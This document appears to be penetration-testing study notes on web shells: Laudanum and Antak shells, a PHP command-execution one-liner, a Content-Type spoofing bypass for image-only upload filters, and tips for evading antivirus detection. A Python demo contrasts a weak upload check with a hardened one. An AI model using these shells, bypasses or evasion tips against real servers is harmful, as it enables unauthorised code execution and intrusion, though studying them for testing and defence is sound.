Web Shells & Payloads

This page is specific to web shells; reverse and bind shells are discussed in other sections.

We'll dive deeper into Metasploit and its details in a later note; this section gives a taste of different web shells, their use cases and the considerations that come with them.

For reverse shells, consider having a look at this.

Web Shells

The idea is to upload a file written in the web app's server-side language (PHP, ASPX, JSP ...) through an upload function (difficulty varies, of course), then browse to the path where it was stored so that the web server executes it. Commands issued through the shell run with the privileges of the web server process.

Considerations

  • A large footprint is left on the server since we are writing files to disk, and every command we send is typically recorded in the web server's access logs.

  • Limited interactivity with the target OS: most web shells are non-interactive (one command per request) and offer few features.

  • Uploaded files might be removed after a specific period of time (cleanup jobs, temporary upload directories).

  • Remove the ASCII art and comments from the file before uploading it; these banners are well-known signatures that may trigger AV or web-shell detection.

Laudanum

A repo of pre-built injectable files for different web app languages, including but not limited to ASP, ASPX, JSP and PHP (shipped under /usr/share/laudanum on Kali and Parrot).

# Make a copy to not modify the original script.
$ cp <path-to-shell.aspx> <target-path>

Then edit the necessary lines and fields in the copy: the Laudanum shells carry a list of IP addresses allowed to use them, which must include your own, and the reverse-connect variants need the listener IP and port.

  • ASP: Microsoft's old server-side scripting language to build dynamic websites. (Replaced by ASP.NET)

  • ASPX: A file extension for ASP.NET, used to create web pages with C# or VB.NET code.

  • JSP: JavaServer Pages, used to build dynamic websites with Java.

  • PHP: A popular open-source scripting language for building dynamic web pages.

Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework. On a web server running ASP.NET, web form pages can be generated for users to input data; on the server side, the page is rendered into HTML. We can take advantage of this by uploading an ASPX-based web shell, which executes as .NET code inside the IIS worker process and lets us control the underlying Windows operating system.

Antak

The power of the Antak web shell (part of the Nishang framework) comes from using PowerShell to interact with the Windows target in a way that looks much like a C2 platform. Change the hard-coded username and password near the top of antak.aspx before uploading it; otherwise anyone who finds the shell can use it.

$ ls /usr/share/nishang/Antak-WebShell

    antak.aspx  Readme.md

$ cp /usr/share/nishang/Antak-WebShell/antak.aspx <target-directory>

PHP Web Shell


If the upload function only accepts images, intercept the request in Burp Suite/ZAP and change the Content-Type header of the file part (for example from application/x-php to image/gif) while keeping the .php filename. A server that only checks that header will accept the file, and the web server will still execute it based on its extension.
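To make the Burp/ZAP step concrete, here is an added example (written for this page, not code from any project) that rebuilds the multipart/form-data request by hand with the file part's Content-Type set to image/gif, then runs the result through two server-side checks: one that trusts the declared Content-Type, and a hardened one that ignores it and requires an allow-listed extension plus matching magic bytes. The boundary string, the field name and the one-line PHP payload are constructed assumptions.

```python
# Added example for this page: the multipart/form-data body an upload form
# sends, rebuilt by hand so the file part's Content-Type can be set the way
# you would in Burp Suite/ZAP, next to a server-side check that trusts that
# header and one that does not. Constructed demo, not code from any project;
# the boundary, the field name and the PHP one-liner are assumptions.
import re

BOUNDARY = "----WebKitFormBoundaryDEMO1234"          # constructed
PHP_ONE_LINER = b"<?php system($_GET['cmd']); ?>"   # constructed sample payload

# what a genuine file of each allowed type starts with (magic bytes)
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def build_upload(filename: str, content_type: str, data: bytes, field: str = "file") -> bytes:
    """Raw multipart/form-data body with a single file part."""
    head = (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n"
        "\r\n"
    ).encode()
    return head + data + f"\r\n--{BOUNDARY}--\r\n".encode()


def parse_upload(body: bytes) -> tuple[str, str, bytes]:
    """Minimal parser for the body above: (filename, declared Content-Type, data)."""
    delim = f"--{BOUNDARY}".encode()
    part = body.split(delim)[1]                          # [0] is the empty preamble
    part = part[2:]                                      # CRLF after the boundary line
    raw_headers, data = part.split(b"\r\n\r\n", 1)
    if data.endswith(b"\r\n"):                           # CRLF before the closing boundary
        data = data[:-2]
    headers = {}
    for line in raw_headers.decode().split("\r\n"):
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    return (m.group(1) if m else ""), headers.get("content-type", "").lower(), data


def naive_accepts(filename: str, content_type: str, data: bytes) -> bool:
    """Weak check found in many upload handlers: trusts the client-supplied
    part Content-Type, which Burp/ZAP lets the attacker set to anything."""
    return content_type in ("image/gif", "image/png", "image/jpeg")


def strict_accepts(filename: str, content_type: str, data: bytes) -> bool:
    """Hardened check: the declared Content-Type is ignored entirely; the file
    needs an allow-listed extension AND matching magic bytes. (Also store it
    under a server-generated name outside the web root; not shown here.)"""
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return False
    return any(data.startswith(sig) for sig in MAGIC[ext])


def demo() -> dict:
    """A spoofed .php upload versus a genuine GIF, through both checks."""
    spoofed = parse_upload(build_upload("shell.php", "image/gif", PHP_ONE_LINER))
    genuine = parse_upload(build_upload("cat.gif", "image/gif", b"GIF89a" + bytes(16)))
    return {
        "spoofed_naive": naive_accepts(*spoofed),    # True: the header fooled it
        "spoofed_strict": strict_accepts(*spoofed),  # False: .php with PHP bytes
        "genuine_naive": naive_accepts(*genuine),    # True
        "genuine_strict": strict_accepts(*genuine),  # True
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The point of the two checks side by side: the Content-Type header is attacker-controlled data like any other part of the request, so a handler that accepts the spoofed part has not validated anything. Whether the stored file is then executed depends on the web server's handler mapping for the extension, which is why the hardened check keys on the extension and the file contents rather than on the header.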

More Shells, but from the other side

Placeholder for defensive side of the Reverse Shells.
